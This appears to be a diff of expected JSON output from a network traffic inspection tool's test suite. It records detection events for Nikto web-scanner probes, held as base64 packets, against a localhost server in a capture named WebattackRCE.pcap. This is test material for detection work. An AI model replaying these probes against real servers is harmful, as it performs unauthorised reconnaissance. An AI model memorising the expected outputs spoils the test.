-00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276756,"flow_last_seen":1576420276756,"flow_idle_time":7440000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"ts_msec":1576420276756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49666,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:origin_reflection)"}}
+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276756,"flow_last_seen":1576420276756,"flow_idle_time":7440000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"ts_msec":1576420276756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49666,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:origin_reflection)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276758,"flow_last_seen":1576420276758,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"ts_msec":1576420276758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49668,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1576420276758,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"ts_msec":1576420276758,"pkt":"AAAAAAAAAAAAAAAACABFAADPoehAAEAGmj5\/AAABfwAAAcIEH5AAZJnEB3vRtYAYAED+wwAAAQEICp1m+z6dZvs+R0VUIC9pbmRleC5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBUcmFuc2xhdGUtZiAjMSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276758,"flow_last_seen":1576420276758,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"ts_msec":1576420276758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49668,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}}
+01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276758,"flow_last_seen":1576420276758,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"ts_msec":1576420276758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49668,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276760,"flow_last_seen":1576420276760,"flow_idle_time":7440000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"ts_msec":1576420276760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49670,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1576420276760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":223,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":223,"pkt_l4_len":189,"ts_msec":1576420276760,"pkt":"AAAAAAAAAAAAAAAACABFAADRGS1AAEAGIvh\/AAABfwAAAcIGH5CUqCEOlTzFf4AYAED+xQAAAQEICp1m+0CdZvtAR0VUIC9qdW5rOTk5LmFzcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IFRyYW5zbGF0ZS1mICMxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276760,"flow_last_seen":1576420276760,"flow_idle_time":7440000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"ts_msec":1576420276760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49670,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/junk999.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}}
+01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276760,"flow_last_seen":1576420276760,"flow_idle_time":7440000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"ts_msec":1576420276760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49670,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/junk999.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276761,"flow_last_seen":1576420276761,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"ts_msec":1576420276761,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49672,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1576420276761,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"ts_msec":1576420276761,"pkt":"AAAAAAAAAAAAAAAACABFAADQx0dAAEAGdN5\/AAABfwAAAcIIH5Btvf9kj27E6oAYAED+xAAAAQEICp1m+0GdZvtBR0VUIC9pbmRleC5hc3B4IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogVHJhbnNsYXRlLWYgIzEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276761,"flow_last_seen":1576420276761,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"ts_msec":1576420276761,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49672,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}}
+01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276761,"flow_last_seen":1576420276761,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"ts_msec":1576420276761,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49672,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276763,"flow_last_seen":1576420276763,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"ts_msec":1576420276763,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49674,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1576420276763,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"ts_msec":1576420276763,"pkt":"AAAAAAAAAAAAAAAACABFAADSXUtAAEAG3th\/AAABfwAAAcIKH5BTRGVwA03HQYAYAED+xgAAAQEICp1m+0OdZvtCR0VUIC9qdW5rOTg4LmFzcHggSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBUcmFuc2xhdGUtZiAjMSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276763,"flow_last_seen":1576420276763,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"ts_msec":1576420276763,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49674,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/junk988.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}}
+01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276763,"flow_last_seen":1576420276763,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"ts_msec":1576420276763,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49674,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/junk988.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276764,"flow_last_seen":1576420276764,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"ts_msec":1576420276764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49676,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1576420276764,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"ts_msec":1576420276764,"pkt":"AAAAAAAAAAAAAAAACABFAADP8RNAAEAGSxN\/AAABfwAAAcIMH5D+v8k3Lccr2IAYAED+wwAAAQEICp1m+0SdZvtER0VUIC9sb2dpbi5hc3AgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IFRyYW5zbGF0ZS1mICMxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276764,"flow_last_seen":1576420276764,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"ts_msec":1576420276764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49676,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}}
+01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276764,"flow_last_seen":1576420276764,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"ts_msec":1576420276764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49676,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276765,"flow_last_seen":1576420276765,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"ts_msec":1576420276765,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49678,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1576420276765,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"ts_msec":1576420276765,"pkt":"AAAAAAAAAAAAAAAACABFAADQIn9AAEAGGad\/AAABfwAAAcIOH5Dotxpb5DtnaoAYAED+xAAAAQEICp1m+0WdZvtFR0VUIC9sb2dpbi5hc3B4IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogVHJhbnNsYXRlLWYgIzEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276765,"flow_last_seen":1576420276765,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"ts_msec":1576420276765,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49678,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}}
+01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276765,"flow_last_seen":1576420276765,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"ts_msec":1576420276765,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49678,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276768,"flow_last_seen":1576420276768,"flow_idle_time":7440000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"ts_msec":1576420276768,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49680,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1576420276768,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"ts_msec":1576420276768,"pkt":"AAAAAAAAAAAAAAAACABFAAC2dlNAAEAGxex\/AAABfwAAAcIQH5C4PE56dk2whIAYAED+qgAAAQEICp1m+0idZvtIR0VUIC8gSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276768,"flow_last_seen":1576420276768,"flow_idle_time":7440000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"ts_msec":1576420276768,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49680,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276768,"flow_last_seen":1576420276768,"flow_idle_time":7440000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"ts_msec":1576420276768,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49680,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276770,"flow_last_seen":1576420276770,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"ts_msec":1576420276770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49682,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00652{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1576420276770,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"ts_msec":1576420276770,"pkt":"AAAAAAAAAAAAAAAACABFAAC8XLtAAEAG335\/AAABfwAAAcISH5CeUGSSsmiGvoAYAED+sAAAAQEICp1m+0qdZvtKR0VUIC9pbWFnZXMgSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276770,"flow_last_seen":1576420276770,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"ts_msec":1576420276770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49682,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
